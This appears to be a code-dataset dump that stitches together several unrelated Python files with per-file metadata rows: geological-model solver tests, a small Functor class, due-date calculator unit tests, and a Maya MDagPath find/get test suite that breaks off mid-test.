model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='cg',
damp=False)
def test_create_stratigraphy_FDI_lu():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='lu',
damp=True)
def test_create_stratigraphy_FDI_pyamg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='FDI',
nelements=1000,
solver='pyamg',
damp=True)
def test_create_stratigraphy_PLI_cg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='PLI',
nelements=1000,
solver='cg',
damp=False)
def test_create_stratigraphy_PLI_lu():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='PLI',
nelements=1000,
solver='lu',
damp=True)
def test_create_stratigraphy_PLI_pyamg():
data, bb = load_claudius()
model = GeologicalModel(bb[0, :], bb[1, :])
model.set_model_data(data)
s0 = model.create_and_add_foliation('s0',
interpolatortype='PLI',
nelements=1000,
solver='pyamg',
damp=True)
def test_model_with_data_outside_of_bounding_box():
pass
| 37.539326
| 63
| 0.471715
| 304
| 3,341
| 4.904605
| 0.134868
| 0.080483
| 0.060362
| 0.108652
| 0.884641
| 0.859826
| 0.859826
| 0.843729
| 0.816901
| 0.816901
| 0
| 0.031562
| 0.431009
| 3,341
| 88
| 64
| 37.965909
| 0.752762
| 0
| 0
| 0.824324
| 0
| 0
| 0.016467
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135135
| false
| 0.013514
| 0.027027
| 0
| 0.162162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dc25b6f26d62a3d4dfa159aa616518c120a8eae
| 243
|
py
|
Python
|
homeworks/alexander_sidorov/lesson17/level08.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
homeworks/alexander_sidorov/lesson17/level08.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | 8
|
2019-11-15T18:15:56.000Z
|
2020-02-03T18:05:05.000Z
|
homeworks/alexander_sidorov/lesson17/level08.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
class Functor:
def __init__(self, function, args, kwargs):
self.__function = function
self.__args = args
self.__kwargs = kwargs
def __call__(self):
return self.__function(*self.__args, **self.__kwargs)
| 27
| 61
| 0.641975
| 27
| 243
| 5.037037
| 0.37037
| 0.264706
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255144
| 243
| 8
| 62
| 30.375
| 0.751381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
422bf6203241d77a9ddf9abafd598a67ec354af3
| 4,290
|
py
|
Python
|
test/test_due_data_calculator.py
|
szabadkai/due-date-calculator
|
c1e6449593b4896b0fbb8b43b5d128ab66944fe5
|
[
"MIT"
] | null | null | null |
test/test_due_data_calculator.py
|
szabadkai/due-date-calculator
|
c1e6449593b4896b0fbb8b43b5d128ab66944fe5
|
[
"MIT"
] | null | null | null |
test/test_due_data_calculator.py
|
szabadkai/due-date-calculator
|
c1e6449593b4896b0fbb8b43b5d128ab66944fe5
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from due_date_calculator import DueDateCalculator
from freezegun import freeze_time
from datetime import datetime as dt
from datetime import timedelta
import config
class TestDueDateCalculator(TestCase):
@freeze_time('2018-10-22 12:00:01')
def setUp(self):
self.calculator = DueDateCalculator(config=config)
@freeze_time('2018-10-22 12:00:01')
def test_instantiation_with_no_args(self):
DueDateCalculator(config=config)
@freeze_time('2018-10-20 12:00:01')
def test_instantiation_fails_with_invalid_date(self):
with self.assertRaises(ValueError):
DueDateCalculator(dt.now(), config=config)
@freeze_time('2018-10-22 12:00:01')
def test_init_with_now_args_results_in_now_start(self):
calculator = DueDateCalculator(config=config)
self.assertEqual(calculator.submitted_date, dt.now())
@freeze_time('2018-10-22 12:00:01')
def test_correct_due_date_is_given_monday_super_happy_path(self):
calculator = DueDateCalculator(config=config)
self.assertEqual(calculator.due_date, dt.now() + timedelta(days=2))
@freeze_time('2018-10-19 12:00:01')
def test_calculator_handles_weekends_gracefully(self):
calculator = DueDateCalculator(config=config)
self.assertEqual(calculator.due_date, dt.now() + timedelta(days=4))
@freeze_time('2018-10-20')
def test_is_weekday(self):
self.assertFalse(self.calculator.is_weekday(dt.now()), 'Saturday')
self.assertFalse(self.calculator.is_weekday(dt.now() + timedelta(days=1)), 'Sunday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=2)), 'Monday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=3)) , 'Tuesday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=4)), 'Wednesday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=5)), 'Thursday')
self.assertTrue(self.calculator.is_weekday(dt.now() + timedelta(days=6)), 'Friday')
self.assertFalse(self.calculator.is_weekday(dt.now() + timedelta(days=7)), 'Saturday')
@freeze_time('2018-10-21')
def test_is_open_hours(self):
self.assertFalse(self.calculator.is_open_hours(dt.now()), "Too early: Midnight")
self.assertFalse(self.calculator.is_open_hours(dt.now() + timedelta(hours=6)), 'Too early: 6am')
self.assertTrue(self.calculator.is_open_hours(dt.now() + timedelta(hours=10)), 'Open: 10am')
self.assertTrue(self.calculator.is_open_hours(dt.now() + timedelta(hours=16, minutes=59)), 'Open: 5:59pm')
self.assertFalse(self.calculator.is_open_hours(dt.now() + timedelta(hours=17)), 'Too late: 6pm')
self.assertFalse(self.calculator.is_open_hours(dt.now() + timedelta(days=-2)), 'Closed: Sunday')
@freeze_time('2018-10-21')
def test_is_business_hours_on_weekend(self):
self.assertFalse(self.calculator.is_business_hour(dt.now()), "Too early: Midnight")
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=6)), 'Too early: 6am')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=10)), 'Open: 10am')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=16, minutes=59)), 'Open: 5:59pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=17)), 'Too late: 6pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(days=-2)), 'Closed: Sunday')
@freeze_time('2018-10-22')
def test_is_busines_hours_on_weekday(self):
self.assertFalse(self.calculator.is_business_hour(dt.now()), "Too early: Midnight")
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=6)), 'Too early: 6am')
self.assertTrue(self.calculator.is_business_hour(dt.now() + timedelta(hours=10)), 'Open: 10am')
self.assertTrue(self.calculator.is_business_hour(dt.now() + timedelta(hours=16, minutes=59)), 'Open: 5:59pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(hours=17)), 'Too late: 6pm')
self.assertFalse(self.calculator.is_business_hour(dt.now() + timedelta(days=-2)), 'Closed: Sunday')
| 56.447368
| 118
| 0.712354
| 583
| 4,290
| 5.06175
| 0.15952
| 0.142325
| 0.140969
| 0.167062
| 0.806506
| 0.788546
| 0.773975
| 0.746865
| 0.696374
| 0.67367
| 0
| 0.047696
| 0.13986
| 4,290
| 75
| 119
| 57.2
| 0.752033
| 0
| 0
| 0.269841
| 0
| 0
| 0.10676
| 0
| 0
| 0
| 0
| 0
| 0.47619
| 1
| 0.15873
| false
| 0
| 0.095238
| 0
| 0.269841
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
423d2ce91f0ae10eb6470918a9c8f42e798c6afe
| 43,461
|
py
|
Python
|
tests/OpenMaya/test_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 24
|
2017-01-11T15:57:46.000Z
|
2020-09-23T06:18:30.000Z
|
tests/OpenMaya/test_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | null | null | null |
tests/OpenMaya/test_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 2
|
2017-03-06T23:52:08.000Z
|
2020-09-23T06:19:03.000Z
|
#!/usr/bin/env mayapy
import os
import sys
import unittest
import maya.standalone
from maya import OpenMaya, cmds
_HERE = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(_HERE, *((os.pardir,) * 2))))
import bana
import tests._util
bana.initialize()
maya.standalone.initialize()
class MDagPathTest(unittest.TestCase):
def setUp(self):
OpenMaya.MFileIO.newFile(True)
context = tests._util.Context()
master = tests._util.createTransform(context, name='master')
tests._util.createTransform(context, name='node', parent=master)
tests._util.createTransform(context, name='awesome_node', parent=master)
tests._util.createTransform(context, name='node_awesome', parent=master)
tests._util.createTransform(context, name='n0de', parent=master)
root1 = tests._util.createTransform(context, name='root_1', parent=master)
child1 = tests._util.createTransform(context, name='child_1', parent=root1)
tests._util.createTransform(context, name='node', parent=child1)
root2 = tests._util.createTransform(context, name='root_2', parent=master)
child2 = tests._util.createTransform(context, name='child_2', parent=root2)
grandchild = tests._util.createTransform(context, name='grandchild', parent=child2)
tests._util.createTransform(context, name='node', parent=grandchild)
cube, cubeShape = tests._util.createPolyCube(context, name='cube', parent=master)
intermediary1 = tests._util.createDagNode(context, 'mesh', name='intermediary1', parent=cube)
context.dg.newPlugValueBool(intermediary1.findPlug('intermediateObject'), True)
context.dg.connect(cubeShape.findPlug('outMesh'), intermediary1.findPlug('inMesh'))
intermediary2 = tests._util.createDagNode(context, 'mesh', name='intermediary2', parent=cube)
context.dg.newPlugValueBool(intermediary2.findPlug('intermediateObject'), True)
context.dg.connect(cubeShape.findPlug('outMesh'), intermediary2.findPlug('inMesh'))
template = tests._util.createDagNode(context, 'mesh', name='template', parent=cube)
context.dg.newPlugValueBool(template.findPlug('template'), True)
context.dg.connect(cubeShape.findPlug('outMesh'), template.findPlug('inMesh'))
sphere, sphereShape = tests._util.createNurbsSphere(context, name='sphere', parent=master)
circle, circleShape = tests._util.createNurbsCircle(context, name='circle', parent=master)
OpenMaya.MNamespace.addNamespace('awesome')
light = tests._util.createTransform(context, name='awesome:light', parent=master)
tests._util.createDagNode(context, 'pointLight', name='awesome:lightShape', parent=light)
context.dag.doIt()
context.dg.doIt()
cmds.projectCurve(circleShape.fullPathName(), sphereShape.fullPathName())
def test__hash__(self):
dagPath1 = OpenMaya.MDagPath.bnGet(pattern='|master|node')
dagPath2 = OpenMaya.MDagPath.bnGet(pattern='|master|node')
self.assertEqual(hash(dagPath1), hash(dagPath2))
def test__str__(self):
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|node')
self.assertEqual(str(dagPath), '|master|node')
def testBnFind(self):
dagPaths = list(OpenMaya.MDagPath.bnFind())
self.assertEqual(len(dagPaths), 37)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(recursive=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 31)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|child_*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1', '|master|root_2|child_2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|child_*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|root_1|child_1', '|master|root_2|child_2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|node'))
self.assertEqual(len(dagPaths), 3)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|node'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|*node'))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome_node', '|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|node*'))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|node', '|master|node_awesome', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|n*de'))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|n0de', '|master|node', '|master|root_1|child_1|node', '|master|root_2|child_2|grandchild|node'])
dagPaths = list(OpenMaya.MDagPath.bnFind(fnType=OpenMaya.MFn.kMesh))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template'])
dagPaths = list(OpenMaya.MDagPath.bnFind(fnType=OpenMaya.MFn.kNurbsSurface))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|awesome:*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light', '|master|awesome:light|awesome:lightShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|awesome:*|awesome:*'))
self.assertEqual(len(dagPaths), 1)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|awesome:light|awesome:lightShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|sphereShape->|*'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='*|sphereShape->*|*Shape*'))
self.assertEqual(len(dagPaths), 2)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind('*|*Shape*'))
self.assertEqual(len(dagPaths), 7)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|circle|circleShape', '|master|cube|cubeShape', '|master|sphere|sphereShape', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind('*|*:*Shape*'))
self.assertEqual(len(dagPaths), 8)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|awesome:light|awesome:lightShape', '|master|circle|circleShape', '|master|cube|cubeShape', '|master|sphere|sphereShape', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind('*->*|*:*Shape*'))
self.assertEqual(len(dagPaths), 10)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|awesome:light|awesome:lightShape', '|master|circle|circleShape', '|master|cube|cubeShape', '|master|sphere|sphereShape', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.'))
self.assertEqual(len(dagPaths), 31)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.', recursive=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.', traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='+'))
self.assertEqual(len(dagPaths), 37)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='+', recursive=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|master', '|persp', '|side', '|top'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='+', traverseUnderWorld=False))
self.assertEqual(len(dagPaths), 31)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front', '|front|frontShape', '|master', '|master|awesome:light', '|master|awesome:light|awesome:lightShape', '|master|awesome_node', '|master|circle', '|master|circle|circleShape', '|master|cube', '|master|cube|cubeShape', '|master|cube|intermediary1', '|master|cube|intermediary2', '|master|cube|template', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_1|child_1', '|master|root_1|child_1|node', '|master|root_2', '|master|root_2|child_2', '|master|root_2|child_2|grandchild', '|master|root_2|child_2|grandchild|node', '|master|sphere', '|master|sphere|sphereShape', '|persp', '|persp|perspShape', '|side', '|side|sideShape', '|top', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|.'))
self.assertEqual(len(dagPaths), 14)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|master|awesome:light', '|master|awesome_node', '|master|circle', '|master|cube', '|master|n0de', '|master|node', '|master|node_awesome', '|master|root_1', '|master|root_2', '|master|sphere', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|.', recursive=False))
self.assertEqual(len(dagPaths), 0)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), [])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='.|.', fnType=OpenMaya.MFn.kShape))
self.assertEqual(len(dagPaths), 4)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|front|frontShape', '|persp|perspShape', '|side|sideShape', '|top|topShape'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='|master|sphere|sphereShape->*'))
self.assertEqual(len(dagPaths), 6)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->', '|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(pattern='|master|sphere|sphereShape->|*'))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertEqual(sorted(dagPath.fullPathName() for dagPath in dagPaths), ['|master|sphere|sphereShape->|projectionCurve1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_1|projectionCurve1_Shape1', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2', '|master|sphere|sphereShape->|projectionCurve1|projectionCurve1_2|projectionCurve1_Shape2'])
dagPaths = list(OpenMaya.MDagPath.bnFind(recursive=False, copy=False))
self.assertEqual(len(dagPaths), 5)
self.assertTrue(all(type(dagPath) is OpenMaya.MDagPath for dagPath in dagPaths))
self.assertTrue(all(dagPath is dagPaths[0] for dagPath in dagPaths))
def testBnGet(self):
self.assertIsNone(OpenMaya.MDagPath.bnGet(pattern='|node'))
self.assertIsNone(OpenMaya.MDagPath.bnGet(pattern='*|node'))
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|master|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_1|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_2|child_2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_2|child_2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|root_1|child_1')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1')
dagPath = OpenMaya.MDagPath.bnGet(pattern='*|root_2|child_2')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_2|child_2')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_1|child_*|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_1|child_1|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|root_2|child_*|*|node')
self.assertIsInstance(dagPath, OpenMaya.MDagPath)
self.assertEqual(dagPath.fullPathName(), '|master|root_2|child_2|grandchild|node')
dagPath = OpenMaya.MDagPath.bnGet(pattern='|master|awesome:light')
